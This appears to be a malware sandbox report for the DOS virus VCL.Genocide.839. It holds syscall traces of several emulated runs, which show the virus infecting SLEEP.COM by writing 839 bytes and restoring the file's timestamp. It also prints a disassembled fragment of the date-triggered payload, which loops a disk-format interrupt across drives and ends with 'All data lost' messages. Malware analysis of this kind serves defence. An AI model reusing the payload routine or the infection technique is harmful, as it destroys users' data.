Sample viewer

vx.netlux.org/Virus.DOS.VCL.Genocide.839

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T23:09:35.608069462Z 42 PC: 12abc | Get date 0x12abc: cmp dx, 0x801
0x12ac0: jne 0x12ae8
0x12ac2: mov ah, 0x3e
0x12ac4: int 0x21
0x12ac6: mov byte ptr [0x3e9], 0x1a
0x12acb: mov al, 0
0x12acd: mov ah, 5
0x12acf: mov ch, 0
0x12ad1: mov dh, 0
0x12ad3: mov dl, byte ptr [0x3e9]
0x12ad7: int 0x13
0x12ad9: dec byte ptr [0x3e9]
0x12add: cmp byte ptr [0x3e9], 0xff
0x12ae2: jne 0x12acb
0x12ae4: call 0x12c66
0x12ae7: ret
0x12ae8: mov di, bp
0x12aea: mov bp, sp
0x12aec: sub sp, 0x80
0x12af0: mov ah, 0x2f
2018-12-17T23:09:35.611566201Z 47 PC: 12af4 | Get disk transfer address
2018-12-17T23:09:35.613160503Z 26 PC: 12afc | Set disk transfer address
2018-12-17T23:09:35.614464956Z 71 PC: 12b24 | Get current directory
2018-12-17T23:09:35.619519566Z 59 PC: 12b2c | Change current directory
2018-12-17T23:09:35.625265237Z 47 PC: 12b41 | Get disk transfer address
2018-12-17T23:09:35.627521756Z 26 PC: 12b4f | Set disk transfer address
2018-12-17T23:09:35.629458678Z 78 PC: 12b5a | Find first file
2018-12-17T23:09:35.64279182Z 79 PC: 12b82 | Find next file
2018-12-17T23:09:35.648359736Z 79 PC: 12b82 | Find next file
2018-12-17T23:09:35.651321239Z 79 PC: 12b82 | Find next file
2018-12-17T23:09:35.654735857Z 79 PC: 12b82 | Find next file
2018-12-17T23:09:35.657636475Z 79 PC: 12b82 | Find next file
2018-12-17T23:09:35.660662472Z 79 PC: 12b82 | Find next file
2018-12-17T23:09:35.668437734Z 79 PC: 12b82 | Find next file
2018-12-17T23:09:35.671465989Z 79 PC: 12b82 | Find next file
2018-12-17T23:09:35.674505809Z 79 PC: 12b82 | Find next file
2018-12-17T23:09:35.677673549Z 47 PC: 12ba6 | Get disk transfer address
2018-12-17T23:09:35.68031257Z 26 PC: 12bb5 | Set disk transfer address
2018-12-17T23:09:35.68151014Z 78 PC: 12bbd | Find first file
2018-12-17T23:09:35.688576176Z 47 PC: 12bd5 | Get disk transfer address
2018-12-17T23:09:35.700919687Z 61 PC: 12bed | Open file (Filename = 'SLEEP.COM')
2018-12-17T23:09:35.70921206Z 63 PC: 12bf9 | Read file or device (Read 3 bytes on handle 5)
2018-12-17T23:09:35.716716821Z 66 PC: 12c01 | Move file pointer
2018-12-17T23:09:35.719736914Z 62 PC: 12c06 | Close file
2018-12-17T23:09:35.722862168Z 67 PC: 12c26 | Get or set file attributes
2018-12-17T23:09:35.741395181Z 61 PC: 12c2b | Open file (Filename = 'SLEEP.COM')
2018-12-17T23:09:35.754432757Z 64 PC: 12c37 | Write file or device (Write 3 bytes on handle 5)
2018-12-17T23:09:35.756790223Z 66 PC: 12c3f | Move file pointer
2018-12-17T23:09:35.758644762Z 64 PC: 12dfd | Write file or device (Write 839 bytes on handle 5)
2018-12-17T23:09:35.766081349Z 87 PC: 12c4f | Get or set file date and time
2018-12-17T23:09:35.767733524Z 62 PC: 12c53 | Close file
2018-12-17T23:09:35.773119353Z 67 PC: 12c60 | Get or set file attributes
2018-12-17T23:09:35.780648964Z 26 PC: 12bcf | Set disk transfer address
2018-12-17T23:09:35.782255368Z 26 PC: 12b92 | Set disk transfer address
2018-12-17T23:09:35.783704856Z 59 PC: 12b36 | Change current directory
2018-12-17T23:09:35.786010075Z 26 PC: 12b04 | Set disk transfer address
2018-12-17T23:09:35.788294134Z 26 PC: 12a47 | Set disk transfer address
2018-12-17T23:09:35.790067776Z 78 PC: 12a6a | Find first file
2018-12-17T23:09:35.79408291Z 76 PC: 12a77 | Terminate with return code (Return code = '1')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":16586,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:53:27.935860656Z 42 PC: 12abc | Get date 0x12abc: cmp dx, 0x801
0x12ac0: jne 0x12ae8
0x12ac2: mov ah, 0x3e
0x12ac4: int 0x21
0x12ac6: mov byte ptr [0x3e9], 0x1a
0x12acb: mov al, 0
0x12acd: mov ah, 5
0x12acf: mov ch, 0
0x12ad1: mov dh, 0
0x12ad3: mov dl, byte ptr [0x3e9]
0x12ad7: int 0x13
0x12ad9: dec byte ptr [0x3e9]
0x12add: cmp byte ptr [0x3e9], 0xff
0x12ae2: jne 0x12acb
0x12ae4: call 0x12c66
0x12ae7: ret
0x12ae8: mov di, bp
0x12aea: mov bp, sp
0x12aec: sub sp, 0x80
0x12af0: mov ah, 0x2f
2018-12-25T12:53:27.939064894Z 47 PC: 12af4 | Get disk transfer address
2018-12-25T12:53:27.940301124Z 26 PC: 12afc | Set disk transfer address
2018-12-25T12:53:27.941333049Z 71 PC: 12b24 | Get current directory
2018-12-25T12:53:27.944457727Z 59 PC: 12b2c | Change current directory
2018-12-25T12:53:27.949569187Z 47 PC: 12b41 | Get disk transfer address
2018-12-25T12:53:27.951043975Z 26 PC: 12b4f | Set disk transfer address
2018-12-25T12:53:27.952131088Z 78 PC: 12b5a | Find first file
2018-12-25T12:53:27.959336091Z 79 PC: 12b82 | Find next file
2018-12-25T12:53:27.962158934Z 79 PC: 12b82 | Find next file (See above)
2018-12-25T12:53:27.964865266Z 79 PC: 12b82 | Find next file (See above)
2018-12-25T12:53:27.968509723Z 79 PC: 12b82 | Find next file (See above)
2018-12-25T12:53:27.971572091Z 79 PC: 12b82 | Find next file (See above)
2018-12-25T12:53:27.974412047Z 79 PC: 12b82 | Find next file (See above)
2018-12-25T12:53:27.97746719Z 79 PC: 12b82 | Find next file (See above)
2018-12-25T12:53:27.980524242Z 79 PC: 12b82 | Find next file (See above)
2018-12-25T12:53:27.983234528Z 79 PC: 12b82 | Find next file (See above)
2018-12-25T12:53:27.986590063Z 47 PC: 12ba6 | Get disk transfer address
2018-12-25T12:53:27.987914783Z 26 PC: 12bb5 | Set disk transfer address
2018-12-25T12:53:27.989136917Z 78 PC: 12bbd | Find first file
2018-12-25T12:53:27.996037221Z 47 PC: 12bd5 | Get disk transfer address
2018-12-25T12:53:27.997313848Z 61 PC: 12bed | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:53:28.005205205Z 63 PC: 12bf9 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:53:28.012120349Z 66 PC: 12c01 | Move file pointer
2018-12-25T12:53:28.013948201Z 62 PC: 12c06 | Close file
2018-12-25T12:53:28.015795637Z 67 PC: 12c26 | Get or set file attributes
2018-12-25T12:53:28.03195751Z 61 PC: 12c2b | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:53:28.039228599Z 64 PC: 12c37 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:53:28.042121753Z 66 PC: 12c3f | Move file pointer
2018-12-25T12:53:28.044363332Z 64 PC: 12dfd | Write file or device (Write 839 bytes on handle 5)
2018-12-25T12:53:28.054309496Z 87 PC: 12c4f | Get or set file date and time
2018-12-25T12:53:28.05626294Z 62 PC: 12c53 | Close file
2018-12-25T12:53:28.064844614Z 67 PC: 12c60 | Get or set file attributes
2018-12-25T12:53:28.076495776Z 26 PC: 12bcf | Set disk transfer address
2018-12-25T12:53:28.077754687Z 26 PC: 12b92 | Set disk transfer address
2018-12-25T12:53:28.07896063Z 59 PC: 12b36 | Change current directory
2018-12-25T12:53:28.081279334Z 26 PC: 12b04 | Set disk transfer address
2018-12-25T12:53:28.082537098Z 26 PC: 12a47 | Set disk transfer address
2018-12-25T12:53:28.083782418Z 78 PC: 12a6a | Find first file
2018-12-25T12:53:28.086312479Z 76 PC: 12a77 | Terminate with return code (Return code = '1')

{"DateBased":true,"Day":1,"Month":8,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":16586,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:53:28.267918633Z 42 PC: 12abc | Get date 0x12abc: cmp dx, 0x801
0x12ac0: jne 0x12ae8
0x12ac2: mov ah, 0x3e
0x12ac4: int 0x21
0x12ac6: mov byte ptr [0x3e9], 0x1a
0x12acb: mov al, 0
0x12acd: mov ah, 5
0x12acf: mov ch, 0
0x12ad1: mov dh, 0
0x12ad3: mov dl, byte ptr [0x3e9]
0x12ad7: int 0x13
0x12ad9: dec byte ptr [0x3e9]
0x12add: cmp byte ptr [0x3e9], 0xff
0x12ae2: jne 0x12acb
0x12ae4: call 0x12c66
0x12ae7: ret
0x12ae8: mov di, bp
0x12aea: mov bp, sp
0x12aec: sub sp, 0x80
0x12af0: mov ah, 0x2f
2018-12-25T12:53:28.270367948Z 62 PC: 12ac6 | Close file
2018-12-25T12:53:28.27489777Z 9 PC: 12c85 | Display string (String= '* This was a very bad day to switch on the Computer! *')
2018-12-25T12:53:28.279460681Z 9 PC: 12c93 | Display string (String= ' --- Files Infected by the : Genocide2 Virus�! ---')
2018-12-25T12:53:28.284503075Z 9 PC: 12ca1 | Display string (String= ' == Copyright (C) Invader Pro. South Africa 1994. ==')
2018-12-25T12:53:28.287554836Z 9 PC: 12cb4 | Display string (String= 'All data lost ... Have a nice Day!')
2018-12-25T12:53:28.300139982Z 8 PC: 12cb8 | Console input without echo